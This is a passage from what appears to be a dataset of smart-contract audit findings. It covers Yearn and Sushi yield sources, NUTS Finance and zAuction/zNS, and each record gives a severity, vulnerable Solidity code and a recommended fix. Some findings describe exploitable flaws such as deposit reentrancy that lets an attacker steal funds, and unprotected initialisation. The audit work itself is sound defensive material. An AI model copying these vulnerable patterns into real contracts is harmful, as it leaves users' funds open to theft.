\\_refundAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_inputAmount;\\n}\\n```\\n\\n```\\nfunction recoverLostFunds(address \\_token) external onlyOwner\\n{\\n uint256 \\_balance = Transfers.\\_getBalance(\\_token);\\n Transfers.\\_pushFunds(\\_token, treasury, \\_balance);\\n}\\n```\\nчReentrancy guard protection should be added to `Exchange.convertFundsFromInput`, `Exchange.convertFundsFromOutput`, `Exchange.joinPoolFromInput`, `Exchange.recoverLostFunds` at least, and in general to all public/external functions since gas price considerations are less relevant for contracts deployed on BSC.чч```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_outputAmount;\\n}\\n```\\n -Yearn: Re-entrancy attack during depositчhighчDuring the deposit in the `supplyTokenTo` function, the token transfer is happening after the shares are minted and before tokens are deposited to the yearn vault:\\n```\\nfunction supplyTokenTo(uint256 \\_amount, address to) override external {\\n uint256 shares = \\_tokenToShares(\\_amount);\\n\\n \\_mint(to, shares);\\n\\n // NOTE: we have to deposit after calculating shares to mint\\n token.safeTransferFrom(msg.sender, address(this), \\_amount);\\n\\n \\_depositInVault();\\n\\n emit SuppliedTokenTo(msg.sender, shares, \\_amount, to);\\n}\\n```\\n\\nIf the token allows the re-entrancy (e.g., ERC-777), the attacker can do one more transaction during the token transfer and call the `supplyTokenTo` function again. This second call will be done with already modified shares from the first deposit but non-modified token balances. That will lead to an increased amount of shares minted during the `supplyTokenTo`. By using that technique, it's possible to steal funds from other users of the contract.чHave the re-entrancy guard on all the external functions.чч```\\nfunction supplyTokenTo(uint256 \\_amount, address to) override external {\\n uint256 shares = \\_tokenToShares(\\_amount);\\n\\n \\_mint(to, shares);\\n\\n // NOTE: we have to deposit after calculating shares to mint\\n token.safeTransferFrom(msg.sender, address(this), \\_amount);\\n\\n \\_depositInVault();\\n\\n emit SuppliedTokenTo(msg.sender, shares, \\_amount, to);\\n}\\n```\\n -Yearn: Partial deposits are not processed properlyчhighчThe deposit is usually made with all the token balance of the contract:\\n```\\n// this will deposit full balance (for cases like not enough room in Vault)\\nreturn v.deposit();\\n```\\n\\nThe Yearn vault contract has a limit of how many tokens can be deposited there. If the deposit hits the limit, only part of the tokens is deposited (not to exceed the limit). That case is not handled properly, the shares are minted as if all the tokens are accepted, and the “change” is not transferred back to the caller:\\n```\\nfunction supplyTokenTo(uint256 \\_amount, address to) override external {\\n uint256 shares = \\_tokenToShares(\\_amount);\\n\\n \\_mint(to, shares);\\n\\n // NOTE: we have to deposit after calculating shares to mint\\n token.safeTransferFrom(msg.sender, address(this), \\_amount);\\n\\n \\_depositInVault();\\n\\n emit SuppliedTokenTo(msg.sender, shares, \\_amount, to);\\n}\\n```\\nчHandle the edge cases properly.чч```\\n// this will deposit full balance (for cases like not enough room in Vault)\\nreturn v.deposit();\\n```\\n -Sushi: redeemToken redeems less than it shouldчmediumчThe `redeemToken` function takes as argument the amount of SUSHI to redeem. Because the SushiBar's `leave` function - which has to be called to achieve this goal - takes an amount of xSUSHI that is to be burned in exchange for SUSHI, `redeemToken` has to compute the amount of xSUSHI that will result in a return of as many SUSHI tokens as were requested.\\n```\\n/// @notice Redeems tokens from the yield source from the msg.sender, it burn yield bearing tokens and return token to the sender.\\n/// @param amount The amount of `token()` to withdraw. Denominated in `token()` as above.\\n/// @return The actual amount of tokens that were redeemed.\\nfunction redeemToken(uint256 amount) public override returns (uint256) {\\n ISushiBar bar = ISushiBar(sushiBar);\\n ISushi sushi = ISushi(sushiAddr);\\n\\n uint256 totalShares = bar.totalSupply();\\n uint256 barSushiBalance = sushi.balanceOf(address(bar));\\n uint256 requiredShares = amount.mul(totalShares).div(barSushiBalance);\\n\\n uint256 barBeforeBalance = bar.balanceOf(address(this));\\n uint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\n bar.leave(requiredShares);\\n\\n uint256 barAfterBalance = bar.balanceOf(address(this));\\n uint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\n uint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\n uint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\n balances[msg.sender] = balances[msg.sender].sub(barBalanceDiff);\\n sushi.transfer(msg.sender, sushiBalanceDiff);\\n return (sushiBalanceDiff);\\n}\\n```\\n\\nBecause the necessary calculations involve division and amounts have to be integral values, it is usually not possible to get the exact amount of SUSHI tokens that were requested. More precisely, let `a` denote the total supply of xSUSHI and `b` the SushiBar's balance of SUSHI at `a` certain point in time. If the SushiBar's `leave` function is supplied with `x` xSUSHI, then it will transfer floor(x * `b` / a) SUSHI. (We assume throughout this discussion that the numbers involved are small enough such that no overflow occurs and that `a` and `b` are not zero.)\\nHence, if `y` is the amount of SUSHI requested, it would make sense to call `leave` with the biggest number `x` that satisfies floor(x * b / a) <= `y` or the smallest number `x` that satisfies `floor(x * b / a) >= y`. Which of the two is “better” or “correct” needs to be specified, based on the requirements of the caller of `redeemToken`. It seems plausible, though, that the first variant is the one that makes more sense in this context, and the current implementation of `redeemToken` supports this hypothesis. It calls `leave` with `x1 := floor(y * a / b)`, which gives us floor(x1 * b / a) <= `y`. However, `x1` is not necessarily the biggest number that satisfies the relation, so the caller of `redeemToken` might end up with less SUSHI than they could have gotten while still not exceeding `y`.\\nThe correct amount to call `leave` with isx2 := floor((y * a + a - 1) / b) = max { x | floor(x * b / a) <= y }. Since `|x2 - x1| <= 1`, the difference in SUSHI is at most `floor(b / a)`. Nevertheless, even this small difference might subvert fairly reasonable expectations. For example, if someone queries `balanceOfToken` and immediately after that feeds the result into `redeemToken`, they might very well expect to redeem exactly the given amount and not less; it's their current balance, after all. However, that's not always the case with the current implementation.чCalculate `requiredShares` based on the formula above (x2). We also recommend dealing in a clean way with the special cases `totalShares == 0` and `barSushiBalance == 0`.чч```\\n/// @notice Redeems tokens from the yield source from the msg.sender, it burn yield bearing tokens and return token to the sender.\\n/// @param amount The amount of `token()` to withdraw. Denominated in `token()` as above.\\n/// @return The actual amount of tokens that were redeemed.\\nfunction redeemToken(uint256 amount) public override returns (uint256) {\\n ISushiBar bar = ISushiBar(sushiBar);\\n ISushi sushi = ISushi(sushiAddr);\\n\\n uint256 totalShares = bar.totalSupply();\\n uint256 barSushiBalance = sushi.balanceOf(address(bar));\\n uint256 requiredShares = amount.mul(totalShares).div(barSushiBalance);\\n\\n uint256 barBeforeBalance = bar.balanceOf(address(this));\\n uint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\n bar.leave(requiredShares);\\n\\n uint256 barAfterBalance = bar.balanceOf(address(this));\\n uint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\n uint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\n uint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\n balances[msg.sender] = balances[msg.sender].sub(barBalanceDiff);\\n sushi.transfer(msg.sender, sushiBalanceDiff);\\n return (sushiBalanceDiff);\\n}\\n```\\n -Sushi: balanceOfToken underestimates balanceчmediumчThe `balanceOfToken` computation is too pessimistic, i.e., it can underestimate the current balance slightly.\\n```\\n/// @notice Returns the total balance (in asset tokens). This includes the deposits and interest.\\n/// @return The underlying balance of asset tokens\\nfunction balanceOfToken(address addr) public override returns (uint256) {\\n if (balances[addr] == 0) return 0;\\n ISushiBar bar = ISushiBar(sushiBar);\\n\\n uint256 shares = bar.balanceOf(address(this));\\n uint256 totalShares = bar.totalSupply();\\n\\n uint256 sushiBalance =\\n shares.mul(ISushi(sushiAddr).balanceOf(address(sushiBar))).div(\\n totalShares\\n );\\n uint256 sourceShares = bar.balanceOf(address(this));\\n\\n return (balances[addr].mul(sushiBalance).div(sourceShares));\\n}\\n```\\n\\nFirst, it calculates the amount of SUSHI that “belongs to” the yield source contract (sushiBalance), and then it determines the fraction of that amount that would be owed to the address in question. However, the “belongs to” above is a purely theoretical concept; it never happens that the yield source contract as a whole redeems and then distributes that amount among its shareholders; instead, if a shareholder redeems tokens, their request is passed through to the `SushiBar`. So in reality, there's no reason for this two-step process, and the holder's balance of SUSHI is more accurately computed as `balances[addr].mul(ISushi(sushiAddr).balanceOf(address(sushiBar))).div(totalShares)`, which can be greater than what `balanceOfToken` currently returns. Note that this is the amount of SUSHI that `addr` could withdraw directly from the `SushiBar`, based on their amount of shares. Observe also that if we sum these numbers up over all holders in the yield source contract, the result is smaller than or equal to `sushiBalance`. So the sum still doesn't exceed what “belongs to” the yield source contract.чThe `balanceOfToken` function should use the formula above.чч```\\n/// @notice Returns the total balance (in asset tokens). This includes the deposits and interest.\\n/// @return The underlying balance of asset tokens\\nfunction balanceOfToken(address addr) public override returns (uint256) {\\n if (balances[addr] == 0) return 0;\\n ISushiBar bar = ISushiBar(sushiBar);\\n\\n uint256 shares = bar.balanceOf(address(this));\\n uint256 totalShares = bar.totalSupply();\\n\\n uint256 sushiBalance =\\n shares.mul(ISushi(sushiAddr).balanceOf(address(sushiBar))).div(\\n totalShares\\n );\\n uint256 sourceShares = bar.balanceOf(address(this));\\n\\n return (balances[addr].mul(sushiBalance).div(sourceShares));\\n}\\n```\\n -Yearn: Redundant approve callчlowчThe approval for token transfer is done in the following way:\\n```\\nif(token.allowance(address(this), address(v)) < token.balanceOf(address(this))) {\\n token.safeApprove(address(v), 0);\\n token.safeApprove(address(v), type(uint256).max);\\n}\\n```\\n\\nSince the approval will be equal to the maximum value, there's no need to make zero-value approval first.чChange two `safeApprove` to one regular `approve` with the maximum value.чч```\\nif(token.allowance(address(this), address(v)) < token.balanceOf(address(this))) {\\n token.safeApprove(address(v), 0);\\n token.safeApprove(address(v), type(uint256).max);\\n}\\n```\\n -Sushi: Some state variables should be immutable and have more specific typesчlowчThe state variables `sushiBar` and `sushiAddr` are initialized in the contract's constructor and never changed afterward.\\n```\\ncontract SushiYieldSource is IYieldSource {\\n using SafeMath for uint256;\\n address public sushiBar;\\n address public sushiAddr;\\n mapping(address => uint256) public balances;\\n\\n constructor(address \\_sushiBar, address \\_sushiAddr) public {\\n sushiBar = \\_sushiBar;\\n sushiAddr = \\_sushiAddr;\\n }\\n```\\n\\nThey should be immutable; that would save some gas and make it clear that they won't (and can't) be changed once the contract has been deployed.\\nMoreover, they would better have more specific interface types than `address`, i.e., `ISushiBar` for `sushiBar` and `ISushi` for `sushiAddr`. That would be safer and make the code more readable.чMake these two state variables `immutable` and change their types as indicated above. Remove the corresponding explicit type conversions in the rest of the contract, and add explicit conversions to type `address` where necessary.чч```\\ncontract SushiYieldSource is IYieldSource {\\n using SafeMath for uint256;\\n address public sushiBar;\\n address public sushiAddr;\\n mapping(address => uint256) public balances;\\n\\n constructor(address \\_sushiBar, address \\_sushiAddr) public {\\n sushiBar = \\_sushiBar;\\n sushiAddr = \\_sushiAddr;\\n }\\n```\\n -Sushi: Unnecessary balance queriesчlowчIn function `redeemToken`, `barBalanceDiff` is always the same as `requiredShares` because the SushiBar's `leave` function burns exactly `requiredShares` xSUSHI.\\n```\\nuint256 barBeforeBalance = bar.balanceOf(address(this));\\nuint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\nbar.leave(requiredShares);\\n\\nuint256 barAfterBalance = bar.balanceOf(address(this));\\nuint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\nuint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\nuint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\nbalances[msg.sender] = balances[msg.sender].sub(barBalanceDiff);\\n```\\nчUse `requiredShares` instead of `barBalanceDiff`, and remove the unnecessary queries and variables.чч```\\nuint256 barBeforeBalance = bar.balanceOf(address(this));\\nuint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\nbar.leave(requiredShares);\\n\\nuint256 barAfterBalance = bar.balanceOf(address(this));\\nuint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\nuint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\nuint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\nbalances[msg.sender] = balances[msg.sender].sub(barBalanceDiff);\\n```\\n -Sushi: Unnecessary function declaration in interfaceчlowчThe `ISushiBar` interface declares a `transfer` function.\\n```\\ninterface ISushiBar {\\n function enter(uint256 \\_amount) external;\\n\\n function leave(uint256 \\_share) external;\\n\\n function totalSupply() external view returns (uint256);\\n\\n function balanceOf(address account) external view returns (uint256);\\n\\n function transfer(address recipient, uint256 amount)\\n external\\n returns (bool);\\n}\\n```\\n\\nHowever, this function is never used, so it could be removed from the interface. Other functions that the `SushiBar` provides but are not used (approve, for example) aren't part of the interface either.чRemove the `transfer` declaration from the `ISushiBar` interface.чч```\\ninterface ISushiBar {\\n function enter(uint256 \\_amount) external;\\n\\n function leave(uint256 \\_share) external;\\n\\n function totalSupply() external view returns (uint256);\\n\\n function balanceOf(address account) external view returns (uint256);\\n\\n function transfer(address recipient, uint256 amount)\\n external\\n returns (bool);\\n}\\n```\\n -Simplify the harvest method in each SinglePlusчlowчThe `BadgerSBTCCrvPlus` single plus contract implements a custom `harvest` method.\\n```\\n/\\*\\*\\n \\* @dev Harvest additional yield from the investment.\\n \\* Only governance or strategist can call this function.\\n \\*/\\nfunction harvest(address[] calldata \\_tokens, uint256[] calldata \\_cumulativeAmounts, uint256 \\_index, uint256 \\_cycle,\\n```\\n\\nThis method can only be called by the strategist because of the `onlyStrategist` modifier.\\nThis method has a few steps which take one asset and transform it into another asset a few times.\\nIt first claims the Badger tokens:\\n```\\n// 1. Harvest from Badger Tree\\nIBadgerTree(BADGER\\_TREE).claim(\\_tokens, \\_cumulativeAmounts, \\_index, \\_cycle, \\_merkleProof, \\_amountsToClaim);\\n```\\n\\nThen it transforms the Badger tokens into WBTC using Uniswap.\\n```\\n// 2. Sushi: Badger --> WBTC\\nuint256 \\_badger = IERC20Upgradeable(BADGER).balanceOf(address(this));\\nif (\\_badger > 0) {\\n IERC20Upgradeable(BADGER).safeApprove(SUSHISWAP, 0);\\n IERC20Upgradeable(BADGER).safeApprove(SUSHISWAP, \\_badger);\\n\\n address[] memory \\_path = new address[](2);\\n \\_path[0] = BADGER;\\n \\_path[1] = WBTC;\\n\\n IUniswapRouter(SUSHISWAP).swapExactTokensForTokens(\\_badger, uint256(0), \\_path, address(this), block.timestamp.add(1800));\\n}\\n```\\n\\nThis step can be simplified in two ways.\\nFirst, the `safeApprove` method isn't useful because its usage is not recommended anymore.\\nThe OpenZeppelin version 4 implementation states the method is deprecated and its usage is discouraged.\\n```\\n\\* @dev Deprecated. This function has issues similar to the ones found in\\n\\* {IERC20-approve}, and its usage is discouraged.\\n```\\n\\n```\\n \\* @dev Deprecated. This function has issues similar to the ones found in\\n \\* {IERC20-approve}, and its usage is discouraged.\\n```\\n\\nAnother step is swapping the tokens on Uniswap.\\n```\\nIUniswapRouter(SUSHISWAP).swapExactTokensForTokens(\\_badger, uint256(0), \\_path, address(this), block.timestamp.add(1800));\\n```\\n\\nIn this case, the last argument `block.timestamp.add(1800)` is the deadline. This is useful when the transaction is sent to the network and a deadline is needed to expire the transaction. However, the execution is right now and there's no need for a future expiration date.\\nRemoving the safe math addition will have the same end effect, the tokens will be swapped and the call is not at risk to expire.чResolution\\nComment from NUTS Finance team:\\nWe have replaced all safeApprove() usage with approve() and used block.timestamp as the expiration date.\\nDo not use safe math when sending the expiration date. Use `block.timestamp` for the same effect and a reduced gas cost.\\nApply the same principles for other Single Plus Tokens.чч```\\n/\\*\\*\\n \\* @dev Harvest additional yield from the investment.\\n \\* Only governance or strategist can call this function.\\n \\*/\\nfunction harvest(address[] calldata \\_tokens, uint256[] calldata \\_cumulativeAmounts, uint256 \\_index, uint256 \\_cycle,\\n```\\n -Reduce complexity in modifiers related to governance and strategistчlowчThe modifier onlyGovernance:\\n```\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\n\\nCalls the internal function _checkGovernance:\\n```\\nfunction \\_checkGovernance() internal view {\\n require(msg.sender == governance, \"not governance\");\\n}\\n```\\n\\nThere is no other case where the internal method `_checkGovernance` is called directly.\\nOne can reduce complexity by removing the internal function and moving its code directly in the modifier. This will increase code size but reduce gas used and code complexity.\\nThere are multiple similar instances:\\n```\\nfunction \\_checkStrategist() internal view {\\n require(msg.sender == governance || strategists[msg.sender], \"not strategist\");\\n}\\n\\nmodifier onlyStrategist {\\n \\_checkStrategist();\\n \\_;\\n}\\n```\\n\\n```\\nfunction \\_checkGovernance() internal view {\\n require(msg.sender == governance, \"not governance\");\\n}\\n\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\n\\n```\\nfunction \\_checkGovernance() internal view {\\n require(msg.sender == IGaugeController(controller).governance(), \"not governance\");\\n}\\n\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\nчConsider removing the internal function and including its body in the modifier directly if the code size is not an issue.чч```\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\n -zAuction - incomplete / dead code zWithdraw and zDepositчhighчThe code generally does not appear to be production-ready. The methods `zWithdraw` and `zDeposit` do not appear to be properly implemented. `zWithdraw` rather burns `ETH` balance than withdrawing it for an account (missing transfer) and `zDeposit` manipulates an accounts balance but never receives the `ETH` amount it credits to an account.\\n```\\n function zDeposit(address to) external payable onlyZauction {\\n ethbalance[to] = SafeMath.add(ethbalance[to], msg.value);\\n emit zDeposited(to, msg.value);\\n }\\n\\n function zWithdraw(address from, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n emit zWithdrew(from, amount);\\n }\\n```\\nчResolution\\nobsolete with changes from zer0-os/[email protected]135b2aa removing the `zAccountAccountant`.\\nThe methods do not seem to be used by the zAuction contract. It is highly discouraged from shipping incomplete implementations in productive code. Remove dead/unreachable code. Fix the implementations to perform proper accounting before reintroducing them if they are called by zAuction.чч```\\n function zDeposit(address to) external payable onlyZauction {\\n ethbalance[to] = SafeMath.add(ethbalance[to], msg.value);\\n emit zDeposited(to, msg.value);\\n }\\n\\n function zWithdraw(address from, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n emit zWithdrew(from, amount);\\n }\\n```\\n -zAuction - Unpredictable behavior for users due to admin front running or general bad timingчhighчAn administrator of `zAuctionAccountant` contract can update the `zAuction` contract without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nIn general users of the system should have assurances about the behavior of the action they're about to take.\\nupdating the `zAuction` takes effect immediately. This has the potential to fail acceptance of bids by sellers on the now outdated `zAuction` contract as interaction with the accountant contract is now rejected. This forces bidders to reissue their bids in order for the seller to be able to accept them using the Accountant contract. This may also be used by admins to selectively censor the acceptance of accountant based bids by changing the active `zAuction` address.\\n```\\n function SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n }\\n\\n function SetAdmin(address newadmin) external onlyAdmin{\\n admin = newadmin;\\n emit AdminSet(msg.sender, newadmin);\\n }\\n```\\n\\nUpgradeable contracts may introduce the same unpredictability issues where the proxyUpgradeable owner may divert execution to a new zNS registrar implementation selectively for certain transactions or without prior notice to users.чThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all system-parameter and upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period. This allows users that do not accept the change to withdraw immediately.\\nValidate arguments before updating contract addresses (at least != current/0x0). Consider implementing a 2-step admin ownership transfer (transfer+accept) to avoid losing control of the contract by providing the wrong `ETH` address.чч```\\n function SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n }\\n\\n function SetAdmin(address newadmin) external onlyAdmin{\\n admin = newadmin;\\n emit AdminSet(msg.sender, newadmin);\\n }\\n```\\n -zAuction, zNS - Bids cannot be cancelled, never expire, and the auction lifecycle is unclearчhighчThe lifecycle of a bid both for `zAuction` and `zNS` is not clear, and has many flaws.\\n`zAuction` - Consider the case where a bid is placed, then the underlying asset in being transferred to a new owner. The new owner can now force to sell the asset even though it's might not be relevant anymore.\\n`zAuction` - Once a bid was accepted and the asset was transferred, all other bids need to be invalidated automatically, otherwise and old bid might be accepted even after the formal auction is over.\\n`zAuction`, `zNS` - There is no way for the bidder to cancel an old bid. That might be useful in the event of a significant change in market trend, where the old pricing is no longer relevant. Currently, in order to cancel a bid, the bidder can either withdraw his ether balance from the `zAuctionAccountant`, or disapprove `WETH` which requires an extra transaction that might be front-runned by the seller.\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n\\n```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, \"ZNS: bid info doesnt match/exist\");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, \"ZNS: has been fullfilled\");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\nчConsider adding an expiration field to the message signed by the bidder both for `zAuction` and `zNS`. Consider adding auction control, creating an `auctionId`, and have users bid on specific auctions. By adding this id to the signed message, all other bids are invalidated automatically and users would have to place new bids for a new auction. Optionally allow users to cancel bids explicitly.\\nчч```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n -zAuction - pot. initialization fronrunning and unnecessary init functionчmediumчThe `zAuction` initialization method is unprotected and while only being executable once, can be called by anyone. This might allow someone to monitor the mempool for new deployments of this contract and fron-run the initialization to initialize it with different parameters.\\nA mitigating factor is that this condition can be detected by the deployer as subsequent calls to `init()` will fail.\\nNote: this doesn't adhere to common interface naming convention/oz naming convention where this method would be called `initialize`.\\nNote: that zNS in contrast relies on ou/initializable pattern with proper naming.\\nNote: that this function might not be necessary at all and should be replaced by a constructor instead, as the contract is not used with a proxy pattern.\\n```\\nfunction init(address accountantaddress) external {\\n require(!initialized);\\n initialized = true;\\n accountant = zAuctionAccountant(accountantaddress);\\n}\\n```\\nчThe contract is not used in a proxy pattern, hence, the initialization should be performed in the `constructor` instead.чч```\\nfunction init(address accountantaddress) external {\\n require(!initialized);\\n initialized = true;\\n accountant = zAuctionAccountant(accountantaddress);\\n}\\n```\\n -zAuction - unclear upgrade pathчmediumч`zAuction` appears to implement an upgrade path for the auction system via `zAuctionAccountant`. `zAuction` itself does not hold any value. The `zAuctionAccountant` can be configured to allow only one `zAution` contract to interact with it. The update of the contract reference takes effect immediately (https://github.com/ConsenSys/zer0-zauction-audit-2021-05/issues/7).\\nAcceptance of bids via the accountant on the old contract immediately fail after an admin updates the referenced `zAuction` contract while `WETH` bids may still continue. This may create an unfavorable scenario where two contracts may be active in parallel accepting `WETH` bids.\\nIt should also be noted that 2nd layer bids (signed data) using the accountant for the old contract will not be acceptable anymore.\\n```\\nfunction SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n}\\n```\\nчConsider re-thinking the upgrade path. Avoid keeping multiple versions of the auction contact active.чч```\\nfunction SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n}\\n```\\n -zAuction, zNS - gas griefing by spamming offchain fake bids AcknowledgedчmediumчThe execution status of both `zAuction.acceptBid` and `StakingController.fulfillDomainBid` transactions depend on the bidder, as his approval is needed, his signature is being validated, etc. However, these transactions can be submitted by accounts that are different from the bidder account, or for accounts that do not have the required funds/deposits available, luring the account that has to perform the on-chain call into spending gas on a transaction that is deemed to fail (gas griefing). E.g. posting high-value fake bids for zAuction without having funds deposited or `WETH` approved.\\n```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, \"ZNS: bid info doesnt match/exist\");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, \"ZNS: has been fullfilled\");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\n\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\nчRevert early for checks that depend on the bidder before performing gas-intensive computations.\\nConsider adding a dry-run validation for off-chain components before transaction submission.чч```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, \"ZNS: bid info doesnt match/exist\");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, \"ZNS: has been fullfilled\");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\n -zAuction - hardcoded ropsten token addressчlowчThe auction contract hardcodes the WETH ERC20 token address. this address will not be functional when deploying to 